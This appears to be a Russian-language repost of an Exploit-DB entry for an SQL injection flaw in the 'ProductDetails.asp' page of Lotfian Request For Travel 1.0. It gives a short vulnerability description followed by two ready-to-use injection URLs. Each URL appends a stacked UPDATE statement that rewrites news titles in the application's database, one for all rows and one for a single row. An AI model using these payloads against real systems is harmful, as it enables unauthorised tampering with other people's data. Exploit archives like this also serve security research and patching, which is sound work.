- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29276
- Проверка EDB
-
- Пройдено
- Автор
- AJANN
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- N/A
- Дата публикации
- 2006-12-11
Lotfian Request For Travel 1.0 - 'ProductDetails.asp' SQL Injection
Код:
source: https://www.securityfocus.com/bid/21536/info
Request For Travel is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Version 1.0 is vulnerable; other versions may also be affected.
Change all News titles to "kro" -
http://www.example.com/ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
Change just the NewsId title to = "kro"
http://www.example.com/ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2-
- Источник
- www.exploit-db.com